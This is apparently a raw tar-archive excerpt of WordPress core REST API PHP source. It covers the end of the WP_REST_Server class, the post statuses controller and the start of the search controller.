$send_no_cache_headers = apply_filters( 'rest_send_nocache_headers', is_user_logged_in() );
// send no cache headers if the $send_no_cache_headers is true
// OR if the HTTP_X_HTTP_METHOD_OVERRIDE is used but resulted a 4xx response code.
if ( $send_no_cache_headers || ( true === $method_overridden && strpos( $code, '4' ) === 0 ) ) {
foreach ( wp_get_nocache_headers() as $header => $header_value ) {
if ( empty( $header_value ) ) {
$this->remove_header( $header );
} else {
$this->send_header( $header, $header_value );
}
}
}
if ( ! $served ) {
if ( 'HEAD' === $request->get_method() ) {
return null;
}
// Embed links inside the request.
$result = $this->response_to_data( $result, isset( $_GET['_embed'] ) );
/**
* Filters the API response.
*
* Allows modification of the response data after inserting
* embedded data (if any) and before echoing the response data.
*
* @since 4.8.1
*
* @param array $result Response data to send to the client.
* @param WP_REST_Server $this Server instance.
* @param WP_REST_Request $request Request used to generate the response.
*/
$result = apply_filters( 'rest_pre_echo_response', $result, $this, $request );
$result = wp_json_encode( $result );
$json_error_message = $this->get_json_last_error();
if ( $json_error_message ) {
$json_error_obj = new WP_Error( 'rest_encode_error', $json_error_message, array( 'status' => 500 ) );
$result = $this->error_to_response( $json_error_obj );
$result = wp_json_encode( $result->data[0] );
}
if ( $jsonp_callback ) {
// Prepend '/**/' to mitigate possible JSONP Flash attacks.
// https://miki.it/blog/2014/7/8/abusing-jsonp-with-rosetta-flash/
echo '/**/' . $jsonp_callback . '(' . $result . ')';
} else {
echo $result;
}
}
return null;
}
/**
* Converts a response to data to send.
*
* @since 4.4.0
*
* @param WP_REST_Response $response Response object.
* @param bool $embed Whether links should be embedded.
* @return array {
* Data with sub-requests embedded.
*
* @type array [$_links] Links.
* @type array [$_embedded] Embeddeds.
* }
*/
public function response_to_data( $response, $embed ) {
$data = $response->get_data();
$links = $this->get_compact_response_links( $response );
if ( ! empty( $links ) ) {
// Convert links to part of the data.
$data['_links'] = $links;
}
if ( $embed ) {
// Determine if this is a numeric array.
if ( wp_is_numeric_array( $data ) ) {
$data = array_map( array( $this, 'embed_links' ), $data );
} else {
$data = $this->embed_links( $data );
}
}
return $data;
}
/**
* Retrieves links from a response.
*
* Extracts the links from a response into a structured hash, suitable for
* direct output.
*
* @since 4.4.0
* @static
*
* @param WP_REST_Response $response Response to extract links from.
* @return array Map of link relation to list of link hashes.
*/
public static function get_response_links( $response ) {
$links = $response->get_links();
if ( empty( $links ) ) {
return array();
}
// Convert links to part of the data.
$data = array();
foreach ( $links as $rel => $items ) {
$data[ $rel ] = array();
foreach ( $items as $item ) {
$attributes = $item['attributes'];
$attributes['href'] = $item['href'];
$data[ $rel ][] = $attributes;
}
}
return $data;
}
/**
* Retrieves the CURIEs (compact URIs) used for relations.
*
* Extracts the links from a response into a structured hash, suitable for
* direct output.
*
* @since 4.5.0
* @static
*
* @param WP_REST_Response $response Response to extract links from.
* @return array Map of link relation to list of link hashes.
*/
public static function get_compact_response_links( $response ) {
$links = self::get_response_links( $response );
if ( empty( $links ) ) {
return array();
}
$curies = $response->get_curies();
$used_curies = array();
foreach ( $links as $rel => $items ) {
// Convert $rel URIs to their compact versions if they exist.
foreach ( $curies as $curie ) {
$href_prefix = substr( $curie['href'], 0, strpos( $curie['href'], '{rel}' ) );
if ( strpos( $rel, $href_prefix ) !== 0 ) {
continue;
}
// Relation now changes from '$uri' to '$curie:$relation'.
$rel_regex = str_replace( '\{rel\}', '(.+)', preg_quote( $curie['href'], '!' ) );
preg_match( '!' . $rel_regex . '!', $rel, $matches );
if ( $matches ) {
$new_rel = $curie['name'] . ':' . $matches[1];
$used_curies[ $curie['name'] ] = $curie;
$links[ $new_rel ] = $items;
unset( $links[ $rel ] );
break;
}
}
}
// Push the curies onto the start of the links array.
if ( $used_curies ) {
$links['curies'] = array_values( $used_curies );
}
return $links;
}
/**
* Embeds the links from the data into the request.
*
* @since 4.4.0
*
* @param array $data Data from the request.
* @return array {
* Data with sub-requests embedded.
*
* @type array [$_links] Links.
* @type array [$_embedded] Embeddeds.
* }
*/
protected function embed_links( $data ) {
if ( empty( $data['_links'] ) ) {
return $data;
}
$embedded = array();
foreach ( $data['_links'] as $rel => $links ) {
// Ignore links to self, for obvious reasons.
if ( 'self' === $rel ) {
continue;
}
$embeds = array();
foreach ( $links as $item ) {
// Determine if the link is embeddable.
if ( empty( $item['embeddable'] ) ) {
// Ensure we keep the same order.
$embeds[] = array();
continue;
}
// Run through our internal routing and serve.
$request = WP_REST_Request::from_url( $item['href'] );
if ( ! $request ) {
$embeds[] = array();
continue;
}
// Embedded resources get passed context=embed.
if ( empty( $request['context'] ) ) {
$request['context'] = 'embed';
}
$response = $this->dispatch( $request );
/** This filter is documented in wp-includes/rest-api/class-wp-rest-server.php */
$response = apply_filters( 'rest_post_dispatch', rest_ensure_response( $response ), $this, $request );
$embeds[] = $this->response_to_data( $response, false );
}
// Determine if any real links were found.
$has_links = count( array_filter( $embeds ) );
if ( $has_links ) {
$embedded[ $rel ] = $embeds;
}
}
if ( ! empty( $embedded ) ) {
$data['_embedded'] = $embedded;
}
return $data;
}
/**
* Wraps the response in an envelope.
*
* The enveloping technique is used to work around browser/client
* compatibility issues. Essentially, it converts the full HTTP response to
* data instead.
*
* @since 4.4.0
*
* @param WP_REST_Response $response Response object.
* @param bool $embed Whether links should be embedded.
* @return WP_REST_Response New response with wrapped data
*/
public function envelope_response( $response, $embed ) {
$envelope = array(
'body' => $this->response_to_data( $response, $embed ),
'status' => $response->get_status(),
'headers' => $response->get_headers(),
);
/**
* Filters the enveloped form of a response.
*
* @since 4.4.0
*
* @param array $envelope Envelope data.
* @param WP_REST_Response $response Original response data.
*/
$envelope = apply_filters( 'rest_envelope_response', $envelope, $response );
// Ensure it's still a response and return.
return rest_ensure_response( $envelope );
}
/**
* Registers a route to the server.
*
* @since 4.4.0
*
* @param string $namespace Namespace.
* @param string $route The REST route.
* @param array $route_args Route arguments.
* @param bool $override Optional. Whether the route should be overridden if it already exists.
* Default false.
*/
public function register_route( $namespace, $route, $route_args, $override = false ) {
if ( ! isset( $this->namespaces[ $namespace ] ) ) {
$this->namespaces[ $namespace ] = array();
$this->register_route( $namespace, '/' . $namespace, array(
array(
'methods' => self::READABLE,
'callback' => array( $this, 'get_namespace_index' ),
'args' => array(
'namespace' => array(
'default' => $namespace,
),
'context' => array(
'default' => 'view',
),
),
),
) );
}
// Associative to avoid double-registration.
$this->namespaces[ $namespace ][ $route ] = true;
$route_args['namespace'] = $namespace;
if ( $override || empty( $this->endpoints[ $route ] ) ) {
$this->endpoints[ $route ] = $route_args;
} else {
$this->endpoints[ $route ] = array_merge( $this->endpoints[ $route ], $route_args );
}
}
/**
* Retrieves the route map.
*
* The route map is an associative array with path regexes as the keys. The
* value is an indexed array with the callback function/method as the first
* item, and a bitmask of HTTP methods as the second item (see the class
* constants).
*
* Each route can be mapped to more than one callback by using an array of
* the indexed arrays. This allows mapping e.g. GET requests to one callback
* and POST requests to another.
*
* Note that the path regexes (array keys) must have @ escaped, as this is
* used as the delimiter with preg_match()
*
* @since 4.4.0
*
* @return array `'/path/regex' => array( $callback, $bitmask )` or
* `'/path/regex' => array( array( $callback, $bitmask ), ...)`.
*/
public function get_routes() {
/**
* Filters the array of available endpoints.
*
* @since 4.4.0
*
* @param array $endpoints The available endpoints. An array of matching regex patterns, each mapped
* to an array of callbacks for the endpoint. These take the format
* `'/path/regex' => array( $callback, $bitmask )` or
* `'/path/regex' => array( array( $callback, $bitmask ).
*/
$endpoints = apply_filters( 'rest_endpoints', $this->endpoints );
// Normalise the endpoints.
$defaults = array(
'methods' => '',
'accept_json' => false,
'accept_raw' => false,
'show_in_index' => true,
'args' => array(),
);
foreach ( $endpoints as $route => &$handlers ) {
if ( isset( $handlers['callback'] ) ) {
// Single endpoint, add one deeper.
$handlers = array( $handlers );
}
if ( ! isset( $this->route_options[ $route ] ) ) {
$this->route_options[ $route ] = array();
}
foreach ( $handlers as $key => &$handler ) {
if ( ! is_numeric( $key ) ) {
// Route option, move it to the options.
$this->route_options[ $route ][ $key ] = $handler;
unset( $handlers[ $key ] );
continue;
}
$handler = wp_parse_args( $handler, $defaults );
// Allow comma-separated HTTP methods.
if ( is_string( $handler['methods'] ) ) {
$methods = explode( ',', $handler['methods'] );
} elseif ( is_array( $handler['methods'] ) ) {
$methods = $handler['methods'];
} else {
$methods = array();
}
$handler['methods'] = array();
foreach ( $methods as $method ) {
$method = strtoupper( trim( $method ) );
$handler['methods'][ $method ] = true;
}
}
}
return $endpoints;
}
/**
* Retrieves namespaces registered on the server.
*
* @since 4.4.0
*
* @return array List of registered namespaces.
*/
public function get_namespaces() {
return array_keys( $this->namespaces );
}
/**
* Retrieves specified options for a route.
*
* @since 4.4.0
*
* @param string $route Route pattern to fetch options for.
* @return array|null Data as an associative array if found, or null if not found.
*/
public function get_route_options( $route ) {
if ( ! isset( $this->route_options[ $route ] ) ) {
return null;
}
return $this->route_options[ $route ];
}
/**
* Matches the request to a callback and call it.
*
* @since 4.4.0
*
* @param WP_REST_Request $request Request to attempt dispatching.
* @return WP_REST_Response Response returned by the callback.
*/
public function dispatch( $request ) {
/**
* Filters the pre-calculated result of a REST dispatch request.
*
* Allow hijacking the request before dispatching by returning a non-empty. The returned value
* will be used to serve the request instead.
*
* @since 4.4.0
*
* @param mixed $result Response to replace the requested version with. Can be anything
* a normal endpoint can return, or null to not hijack the request.
* @param WP_REST_Server $this Server instance.
* @param WP_REST_Request $request Request used to generate the response.
*/
$result = apply_filters( 'rest_pre_dispatch', null, $this, $request );
if ( ! empty( $result ) ) {
return $result;
}
$method = $request->get_method();
$path = $request->get_route();
foreach ( $this->get_routes() as $route => $handlers ) {
$match = preg_match( '@^' . $route . '$@i', $path, $matches );
if ( ! $match ) {
continue;
}
$args = array();
foreach ( $matches as $param => $value ) {
if ( ! is_int( $param ) ) {
$args[ $param ] = $value;
}
}
foreach ( $handlers as $handler ) {
$callback = $handler['callback'];
$response = null;
// Fallback to GET method if no HEAD method is registered.
$checked_method = $method;
if ( 'HEAD' === $method && empty( $handler['methods']['HEAD'] ) ) {
$checked_method = 'GET';
}
if ( empty( $handler['methods'][ $checked_method ] ) ) {
continue;
}
if ( ! is_callable( $callback ) ) {
$response = new WP_Error( 'rest_invalid_handler', __( 'The handler for the route is invalid' ), array( 'status' => 500 ) );
}
if ( ! is_wp_error( $response ) ) {
// Remove the redundant preg_match argument.
unset( $args[0] );
$request->set_url_params( $args );
$request->set_attributes( $handler );
$defaults = array();
foreach ( $handler['args'] as $arg => $options ) {
if ( isset( $options['default'] ) ) {
$defaults[ $arg ] = $options['default'];
}
}
$request->set_default_params( $defaults );
$check_required = $request->has_valid_params();
if ( is_wp_error( $check_required ) ) {
$response = $check_required;
} else {
$check_sanitized = $request->sanitize_params();
if ( is_wp_error( $check_sanitized ) ) {
$response = $check_sanitized;
}
}
}
/**
* Filters the response before executing any REST API callbacks.
*
* Allows plugins to perform additional validation after a
* request is initialized and matched to a registered route,
* but before it is executed.
*
* Note that this filter will not be called for requests that
* fail to authenticate or match to a registered route.
*
* @since 4.7.0
*
* @param WP_HTTP_Response $response Result to send to the client. Usually a WP_REST_Response.
* @param WP_REST_Server $handler ResponseHandler instance (usually WP_REST_Server).
* @param WP_REST_Request $request Request used to generate the response.
*/
$response = apply_filters( 'rest_request_before_callbacks', $response, $handler, $request );
if ( ! is_wp_error( $response ) ) {
// Check permission specified on the route.
if ( ! empty( $handler['permission_callback'] ) ) {
$permission = call_user_func( $handler['permission_callback'], $request );
if ( is_wp_error( $permission ) ) {
$response = $permission;
} elseif ( false === $permission || null === $permission ) {
$response = new WP_Error( 'rest_forbidden', __( 'Sorry, you are not allowed to do that.' ), array( 'status' => rest_authorization_required_code() ) );
}
}
}
if ( ! is_wp_error( $response ) ) {
/**
* Filters the REST dispatch request result.
*
* Allow plugins to override dispatching the request.
*
* @since 4.4.0
* @since 4.5.0 Added `$route` and `$handler` parameters.
*
* @param bool $dispatch_result Dispatch result, will be used if not empty.
* @param WP_REST_Request $request Request used to generate the response.
* @param string $route Route matched for the request.
* @param array $handler Route handler used for the request.
*/
$dispatch_result = apply_filters( 'rest_dispatch_request', null, $request, $route, $handler );
// Allow plugins to halt the request via this filter.
if ( null !== $dispatch_result ) {
$response = $dispatch_result;
} else {
$response = call_user_func( $callback, $request );
}
}
/**
* Filters the response immediately after executing any REST API
* callbacks.
*
* Allows plugins to perform any needed cleanup, for example,
* to undo changes made during the {@see 'rest_request_before_callbacks'}
* filter.
*
* Note that this filter will not be called for requests that
* fail to authenticate or match to a registered route.
*
* Note that an endpoint's `permission_callback` can still be
* called after this filter - see `rest_send_allow_header()`.
*
* @since 4.7.0
*
* @param WP_HTTP_Response $response Result to send to the client. Usually a WP_REST_Response.
* @param WP_REST_Server $handler ResponseHandler instance (usually WP_REST_Server).
* @param WP_REST_Request $request Request used to generate the response.
*/
$response = apply_filters( 'rest_request_after_callbacks', $response, $handler, $request );
if ( is_wp_error( $response ) ) {
$response = $this->error_to_response( $response );
} else {
$response = rest_ensure_response( $response );
}
$response->set_matched_route( $route );
$response->set_matched_handler( $handler );
return $response;
}
}
return $this->error_to_response( new WP_Error( 'rest_no_route', __( 'No route was found matching the URL and request method' ), array( 'status' => 404 ) ) );
}
/**
* Returns if an error occurred during most recent JSON encode/decode.
*
* Strings to be translated will be in format like
* "Encoding error: Maximum stack depth exceeded".
*
* @since 4.4.0
*
* @return bool|string Boolean false or string error message.
*/
protected function get_json_last_error() {
// See https://core.trac.wordpress.org/ticket/27799.
if ( ! function_exists( 'json_last_error' ) ) {
return false;
}
$last_error_code = json_last_error();
if ( ( defined( 'JSON_ERROR_NONE' ) && JSON_ERROR_NONE === $last_error_code ) || empty( $last_error_code ) ) {
return false;
}
return json_last_error_msg();
}
/**
* Retrieves the site index.
*
* This endpoint describes the capabilities of the site.
*
* @since 4.4.0
*
* @param array $request {
* Request.
*
* @type string $context Context.
* }
* @return array Index entity
*/
public function get_index( $request ) {
// General site data.
$available = array(
'name' => get_option( 'blogname' ),
'description' => get_option( 'blogdescription' ),
'url' => get_option( 'siteurl' ),
'home' => home_url(),
'gmt_offset' => get_option( 'gmt_offset' ),
'timezone_string' => get_option( 'timezone_string' ),
'namespaces' => array_keys( $this->namespaces ),
'authentication' => array(),
'routes' => $this->get_data_for_routes( $this->get_routes(), $request['context'] ),
);
$response = new WP_REST_Response( $available );
$response->add_link( 'help', 'http://v2.wp-api.org/' );
/**
* Filters the API root index data.
*
* This contains the data describing the API. This includes information
* about supported authentication schemes, supported namespaces, routes
* available on the API, and a small amount of data about the site.
*
* @since 4.4.0
*
* @param WP_REST_Response $response Response data.
*/
return apply_filters( 'rest_index', $response );
}
/**
* Retrieves the index for a namespace.
*
* @since 4.4.0
*
* @param WP_REST_Request $request REST request instance.
* @return WP_REST_Response|WP_Error WP_REST_Response instance if the index was found,
* WP_Error if the namespace isn't set.
*/
public function get_namespace_index( $request ) {
$namespace = $request['namespace'];
if ( ! isset( $this->namespaces[ $namespace ] ) ) {
return new WP_Error( 'rest_invalid_namespace', __( 'The specified namespace could not be found.' ), array( 'status' => 404 ) );
}
$routes = $this->namespaces[ $namespace ];
$endpoints = array_intersect_key( $this->get_routes(), $routes );
$data = array(
'namespace' => $namespace,
'routes' => $this->get_data_for_routes( $endpoints, $request['context'] ),
);
$response = rest_ensure_response( $data );
// Link to the root index.
$response->add_link( 'up', rest_url( '/' ) );
/**
* Filters the namespace index data.
*
* This typically is just the route data for the namespace, but you can
* add any data you'd like here.
*
* @since 4.4.0
*
* @param WP_REST_Response $response Response data.
* @param WP_REST_Request $request Request data. The namespace is passed as the 'namespace' parameter.
*/
return apply_filters( 'rest_namespace_index', $response, $request );
}
/**
* Retrieves the publicly-visible data for routes.
*
* @since 4.4.0
*
* @param array $routes Routes to get data for.
* @param string $context Optional. Context for data. Accepts 'view' or 'help'. Default 'view'.
* @return array Route data to expose in indexes.
*/
public function get_data_for_routes( $routes, $context = 'view' ) {
$available = array();
// Find the available routes.
foreach ( $routes as $route => $callbacks ) {
$data = $this->get_data_for_route( $route, $callbacks, $context );
if ( empty( $data ) ) {
continue;
}
/**
* Filters the REST endpoint data.
*
* @since 4.4.0
*
* @param WP_REST_Request $request Request data. The namespace is passed as the 'namespace' parameter.
*/
$available[ $route ] = apply_filters( 'rest_endpoints_description', $data );
}
/**
* Filters the publicly-visible data for routes.
*
* This data is exposed on indexes and can be used by clients or
* developers to investigate the site and find out how to use it. It
* acts as a form of self-documentation.
*
* @since 4.4.0
*
* @param array $available Map of route to route data.
* @param array $routes Internal route data as an associative array.
*/
return apply_filters( 'rest_route_data', $available, $routes );
}
/**
* Retrieves publicly-visible data for the route.
*
* @since 4.4.0
*
* @param string $route Route to get data for.
* @param array $callbacks Callbacks to convert to data.
* @param string $context Optional. Context for the data. Accepts 'view' or 'help'. Default 'view'.
* @return array|null Data for the route, or null if no publicly-visible data.
*/
public function get_data_for_route( $route, $callbacks, $context = 'view' ) {
$data = array(
'namespace' => '',
'methods' => array(),
'endpoints' => array(),
);
if ( isset( $this->route_options[ $route ] ) ) {
$options = $this->route_options[ $route ];
if ( isset( $options['namespace'] ) ) {
$data['namespace'] = $options['namespace'];
}
if ( isset( $options['schema'] ) && 'help' === $context ) {
$data['schema'] = call_user_func( $options['schema'] );
}
}
$route = preg_replace( '#\(\?P<(\w+?)>.*?\)#', '{$1}', $route );
foreach ( $callbacks as $callback ) {
// Skip to the next route if any callback is hidden.
if ( empty( $callback['show_in_index'] ) ) {
continue;
}
$data['methods'] = array_merge( $data['methods'], array_keys( $callback['methods'] ) );
$endpoint_data = array(
'methods' => array_keys( $callback['methods'] ),
);
if ( isset( $callback['args'] ) ) {
$endpoint_data['args'] = array();
foreach ( $callback['args'] as $key => $opts ) {
$arg_data = array(
'required' => ! empty( $opts['required'] ),
);
if ( isset( $opts['default'] ) ) {
$arg_data['default'] = $opts['default'];
}
if ( isset( $opts['enum'] ) ) {
$arg_data['enum'] = $opts['enum'];
}
if ( isset( $opts['description'] ) ) {
$arg_data['description'] = $opts['description'];
}
if ( isset( $opts['type'] ) ) {
$arg_data['type'] = $opts['type'];
}
if ( isset( $opts['items'] ) ) {
$arg_data['items'] = $opts['items'];
}
$endpoint_data['args'][ $key ] = $arg_data;
}
}
$data['endpoints'][] = $endpoint_data;
// For non-variable routes, generate links.
if ( strpos( $route, '{' ) === false ) {
$data['_links'] = array(
'self' => rest_url( $route ),
);
}
}
if ( empty( $data['methods'] ) ) {
// No methods supported, hide the route.
return null;
}
return $data;
}
/**
* Sends an HTTP status code.
*
* @since 4.4.0
*
* @param int $code HTTP status.
*/
protected function set_status( $code ) {
status_header( $code );
}
/**
* Sends an HTTP header.
*
* @since 4.4.0
*
* @param string $key Header key.
* @param string $value Header value.
*/
public function send_header( $key, $value ) {
/*
* Sanitize as per RFC2616 (Section 4.2):
*
* Any LWS that occurs between field-content MAY be replaced with a
* single SP before interpreting the field value or forwarding the
* message downstream.
*/
$value = preg_replace( '/\s+/', ' ', $value );
header( sprintf( '%s: %s', $key, $value ) );
}
/**
* Sends multiple HTTP headers.
*
* @since 4.4.0
*
* @param array $headers Map of header name to header value.
*/
public function send_headers( $headers ) {
foreach ( $headers as $key => $value ) {
$this->send_header( $key, $value );
}
}
/**
* Removes an HTTP header from the current response.
*
* @since 4.8.0
*
* @param string $key Header key.
*/
public function remove_header( $key ) {
if ( function_exists( 'header_remove' ) ) {
// In PHP 5.3+ there is a way to remove an already set header.
header_remove( $key );
} else {
// In PHP 5.2, send an empty header, but only as a last resort to
// override a header already sent.
foreach ( headers_list() as $header ) {
if ( 0 === stripos( $header, "$key:" ) ) {
$this->send_header( $key, '' );
break;
}
}
}
}
/**
* Retrieves the raw request entity (body).
*
* @since 4.4.0
*
* @global string $HTTP_RAW_POST_DATA Raw post data.
*
* @return string Raw request data.
*/
public static function get_raw_data() {
global $HTTP_RAW_POST_DATA;
/*
* A bug in PHP < 5.2.2 makes $HTTP_RAW_POST_DATA not set by default,
* but we can do it ourself.
*/
if ( ! isset( $HTTP_RAW_POST_DATA ) ) {
$HTTP_RAW_POST_DATA = file_get_contents( 'php://input' );
}
return $HTTP_RAW_POST_DATA;
}
/**
* Extracts headers from a PHP-style $_SERVER array.
*
* @since 4.4.0
*
* @param array $server Associative array similar to `$_SERVER`.
* @return array Headers extracted from the input.
*/
public function get_headers( $server ) {
$headers = array();
// CONTENT_* headers are not prefixed with HTTP_.
$additional = array( 'CONTENT_LENGTH' => true, 'CONTENT_MD5' => true, 'CONTENT_TYPE' => true );
foreach ( $server as $key => $value ) {
if ( strpos( $key, 'HTTP_' ) === 0 ) {
$headers[ substr( $key, 5 ) ] = $value;
} elseif ( isset( $additional[ $key ] ) ) {
$headers[ $key ] = $value;
}
}
return $headers;
}
}
������������������������������������������������������������������������endpoints/class-wp-rest-post-statuses-controller.php������������������������������������������������0000666�����������������00000022514�15111427772�0017020 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<?php
/**
* REST API: WP_REST_Post_Statuses_Controller class
*
* @package WordPress
* @subpackage REST_API
* @since 4.7.0
*/
/**
* Core class used to access post statuses via the REST API.
*
* @since 4.7.0
*
* @see WP_REST_Controller
*/
class WP_REST_Post_Statuses_Controller extends WP_REST_Controller {
/**
* Constructor.
*
* @since 4.7.0
*/
public function __construct() {
$this->namespace = 'wp/v2';
$this->rest_base = 'statuses';
}
/**
* Registers the routes for the objects of the controller.
*
* @since 4.7.0
*
* @see register_rest_route()
*/
public function register_routes() {
register_rest_route( $this->namespace, '/' . $this->rest_base, array(
array(
'methods' => WP_REST_Server::READABLE,
'callback' => array( $this, 'get_items' ),
'permission_callback' => array( $this, 'get_items_permissions_check' ),
'args' => $this->get_collection_params(),
),
'schema' => array( $this, 'get_public_item_schema' ),
) );
register_rest_route( $this->namespace, '/' . $this->rest_base . '/(?P<status>[\w-]+)', array(
'args' => array(
'status' => array(
'description' => __( 'An alphanumeric identifier for the status.' ),
'type' => 'string',
),
),
array(
'methods' => WP_REST_Server::READABLE,
'callback' => array( $this, 'get_item' ),
'permission_callback' => array( $this, 'get_item_permissions_check' ),
'args' => array(
'context' => $this->get_context_param( array( 'default' => 'view' ) ),
),
),
'schema' => array( $this, 'get_public_item_schema' ),
) );
}
/**
* Checks whether a given request has permission to read post statuses.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full details about the request.
* @return WP_Error|bool True if the request has read access, WP_Error object otherwise.
*/
public function get_items_permissions_check( $request ) {
if ( 'edit' === $request['context'] ) {
$types = get_post_types( array( 'show_in_rest' => true ), 'objects' );
foreach ( $types as $type ) {
if ( current_user_can( $type->cap->edit_posts ) ) {
return true;
}
}
return new WP_Error( 'rest_cannot_view', __( 'Sorry, you are not allowed to manage post statuses.' ), array( 'status' => rest_authorization_required_code() ) );
}
return true;
}
/**
* Retrieves all post statuses, depending on user context.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full details about the request.
* @return WP_Error|WP_REST_Response Response object on success, or WP_Error object on failure.
*/
public function get_items( $request ) {
$data = array();
$statuses = get_post_stati( array( 'internal' => false ), 'object' );
$statuses['trash'] = get_post_status_object( 'trash' );
foreach ( $statuses as $slug => $obj ) {
$ret = $this->check_read_permission( $obj );
if ( ! $ret ) {
continue;
}
$status = $this->prepare_item_for_response( $obj, $request );
$data[ $obj->name ] = $this->prepare_response_for_collection( $status );
}
return rest_ensure_response( $data );
}
/**
* Checks if a given request has access to read a post status.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full details about the request.
* @return WP_Error|bool True if the request has read access for the item, WP_Error object otherwise.
*/
public function get_item_permissions_check( $request ) {
$status = get_post_status_object( $request['status'] );
if ( empty( $status ) ) {
return new WP_Error( 'rest_status_invalid', __( 'Invalid status.' ), array( 'status' => 404 ) );
}
$check = $this->check_read_permission( $status );
if ( ! $check ) {
return new WP_Error( 'rest_cannot_read_status', __( 'Cannot view status.' ), array( 'status' => rest_authorization_required_code() ) );
}
return true;
}
/**
* Checks whether a given post status should be visible.
*
* @since 4.7.0
*
* @param object $status Post status.
* @return bool True if the post status is visible, otherwise false.
*/
protected function check_read_permission( $status ) {
if ( true === $status->public ) {
return true;
}
if ( false === $status->internal || 'trash' === $status->name ) {
$types = get_post_types( array( 'show_in_rest' => true ), 'objects' );
foreach ( $types as $type ) {
if ( current_user_can( $type->cap->edit_posts ) ) {
return true;
}
}
}
return false;
}
/**
* Retrieves a specific post status.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full details about the request.
* @return WP_Error|WP_REST_Response Response object on success, or WP_Error object on failure.
*/
public function get_item( $request ) {
$obj = get_post_status_object( $request['status'] );
if ( empty( $obj ) ) {
return new WP_Error( 'rest_status_invalid', __( 'Invalid status.' ), array( 'status' => 404 ) );
}
$data = $this->prepare_item_for_response( $obj, $request );
return rest_ensure_response( $data );
}
/**
* Prepares a post status object for serialization.
*
* @since 4.7.0
*
* @param stdClass $status Post status data.
* @param WP_REST_Request $request Full details about the request.
* @return WP_REST_Response Post status data.
*/
public function prepare_item_for_response( $status, $request ) {
$fields = $this->get_fields_for_response( $request );
$data = array();
if ( in_array( 'name', $fields, true ) ) {
$data['name'] = $status->label;
}
if ( in_array( 'private', $fields, true ) ) {
$data['private'] = (bool) $status->private;
}
if ( in_array( 'protected', $fields, true ) ) {
$data['protected'] = (bool) $status->protected;
}
if ( in_array( 'public', $fields, true ) ) {
$data['public'] = (bool) $status->public;
}
if ( in_array( 'queryable', $fields, true ) ) {
$data['queryable'] = (bool) $status->publicly_queryable;
}
if ( in_array( 'show_in_list', $fields, true ) ) {
$data['show_in_list'] = (bool) $status->show_in_admin_all_list;
}
if ( in_array( 'slug', $fields, true ) ) {
$data['slug'] = $status->name;
}
$context = ! empty( $request['context'] ) ? $request['context'] : 'view';
$data = $this->add_additional_fields_to_object( $data, $request );
$data = $this->filter_response_by_context( $data, $context );
$response = rest_ensure_response( $data );
if ( 'publish' === $status->name ) {
$response->add_link( 'archives', rest_url( 'wp/v2/posts' ) );
} else {
$response->add_link( 'archives', add_query_arg( 'status', $status->name, rest_url( 'wp/v2/posts' ) ) );
}
/**
* Filters a status returned from the REST API.
*
* Allows modification of the status data right before it is returned.
*
* @since 4.7.0
*
* @param WP_REST_Response $response The response object.
* @param object $status The original status object.
* @param WP_REST_Request $request Request used to generate the response.
*/
return apply_filters( 'rest_prepare_status', $response, $status, $request );
}
/**
* Retrieves the post status' schema, conforming to JSON Schema.
*
* @since 4.7.0
*
* @return array Item schema data.
*/
public function get_item_schema() {
$schema = array(
'$schema' => 'http://json-schema.org/draft-04/schema#',
'title' => 'status',
'type' => 'object',
'properties' => array(
'name' => array(
'description' => __( 'The title for the status.' ),
'type' => 'string',
'context' => array( 'embed', 'view', 'edit' ),
'readonly' => true,
),
'private' => array(
'description' => __( 'Whether posts with this status should be private.' ),
'type' => 'boolean',
'context' => array( 'edit' ),
'readonly' => true,
),
'protected' => array(
'description' => __( 'Whether posts with this status should be protected.' ),
'type' => 'boolean',
'context' => array( 'edit' ),
'readonly' => true,
),
'public' => array(
'description' => __( 'Whether posts of this status should be shown in the front end of the site.' ),
'type' => 'boolean',
'context' => array( 'view', 'edit' ),
'readonly' => true,
),
'queryable' => array(
'description' => __( 'Whether posts with this status should be publicly-queryable.' ),
'type' => 'boolean',
'context' => array( 'view', 'edit' ),
'readonly' => true,
),
'show_in_list' => array(
'description' => __( 'Whether to include posts in the edit listing for their post type.' ),
'type' => 'boolean',
'context' => array( 'edit' ),
'readonly' => true,
),
'slug' => array(
'description' => __( 'An alphanumeric identifier for the status.' ),
'type' => 'string',
'context' => array( 'embed', 'view', 'edit' ),
'readonly' => true,
),
),
);
return $this->add_additional_fields_schema( $schema );
}
/**
* Retrieves the query params for collections.
*
* @since 4.7.0
*
* @return array Collection parameters.
*/
public function get_collection_params() {
return array(
'context' => $this->get_context_param( array( 'default' => 'view' ) ),
);
}
}
������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������endpoints/class-wp-rest-search-controller.php�������������������������������������������������������0000666�����������������00000024014�15111427772�0015424 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<?php
/**
* REST API: WP_REST_Search_Controller class
*
* @package WordPress
* @subpackage REST_API
* @since 5.0.0
*/
/**
* Core class to search through all WordPress content via the REST API.
*
* @since 5.0.0
*
* @see WP_REST_Controller
*/
class WP_REST_Search_Controller extends WP_REST_Controller {
/**
* ID property name.
*/
const PROP_ID = 'id';
/**
* Title property name.
*/
const PROP_TITLE = 'title';
/**
* URL property name.
*/
const PROP_URL = 'url';
/**
* Type property name.
*/
const PROP_TYPE = 'type';
/**
* Subtype property name.
*/
const PROP_SUBTYPE = 'subtype';
/**
* Identifier for the 'any' type.
*/
const TYPE_ANY = 'any';
/**
* Search handlers used by the controller.
*
* @since 5.0.0
* @var array
*/
protected $search_handlers = array();
/**
* Constructor.
*
* @since 5.0.0
*
* @param array $search_handlers List of search handlers to use in the controller. Each search
* handler instance must extend the `WP_REST_Search_Handler` class.
*/
public function __construct( array $search_handlers ) {
$this->namespace = 'wp/v2';
$this->rest_base = 'search';
foreach ( $search_handlers as $search_handler ) {
if ( ! $search_handler instanceof WP_REST_Search_Handler ) {
/* translators: %s: PHP class name */
_doing_it_wrong( __METHOD__, sprintf( __( 'REST search handlers must extend the %s class.' ), 'WP_REST_Search_Handler' ), '5.0.0' );
continue;
}
$this->search_handlers[ $search_handler->get_type() ] = $search_handler;
}
}
/**
* Registers the routes for the objects of the controller.
*
* @since 5.0.0
*
* @see register_rest_route()
*/
public function register_routes() {
register_rest_route(
